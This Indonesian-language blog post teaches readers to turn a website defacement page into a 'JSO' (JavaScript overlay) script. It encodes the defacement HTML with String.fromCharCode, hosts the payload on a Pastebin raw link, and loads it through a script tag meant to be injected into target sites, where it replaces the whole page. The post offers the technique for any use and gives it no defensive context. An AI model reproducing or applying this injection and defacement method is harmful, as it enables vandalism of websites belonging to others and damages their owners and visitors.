Cara Membuat Script JSo Terbaru 2020


Assalammualaikum guys:) Kembali lagi sama gw Mr ProAL, Kali ini gw bakal ngasih tau cara buat sc jso atau cara ngubah deface ke jso. Jso itu singkatan dari Java Script Overlay yang dimana berfungsi untuk menjadikan satu elemen dari beberapa elemen. Contohnya kaya Sc deface yang lumayan banyak elemen dan di ubah menjadi satu.

Oke langsung aja pertama kita salin dlu codingan sc deface kita, Kalo udh kita buka tools jso generator (touch me), abis itu kita pastekan dah di kolom sc deface lalu klik convert


Kalo udh di klik convert bakal muncul angka angka kaya di gambar atas. kita salin dah nomor nomor itu. Selanjutnya kita buka web pastebin.com, Jika sudah di buka kita pastekan angka angka yang tadi kita salin di kolom new paste, abis itu kita pastekan kode document.documentElement.innerHTML=String.fromCharCode(angkajso) angka angka yg tadi kita salin (angka angkanya taro di dalam kurung). bisa diliat di gambar dibawah / touchme


Selanjutnya kita gulir kebawah dan klik "create new paste", Jika sudah ganti halaman kita klik raw. abis itu kita salin link yg ada di kolom link (co:https://pastebin.com/raw/xbLqUSxy)


Jika udh di salin linknya kita masukan kedalam kode dibawah (pastein di  yg "linknya")

<script type="text/javascript" src="linknya"></script>

Contohnya
<script type="text/javascript" src="https://pastebin.com/raw/xbLqUSxy"></script>

Nahh udh jadi dah sc jsonya, terserah lu mau dipake apapun itu. Mungkin cukup sekian yang bisa gw sampaikan. Kalo kurang faham bisa tanya kan di kolom komentar. Terima Kasih See You Next Time Guys:)

Instagram  : mrproal404
Youtube     : Mr ProAL

Post a Comment

Previous Post Next Post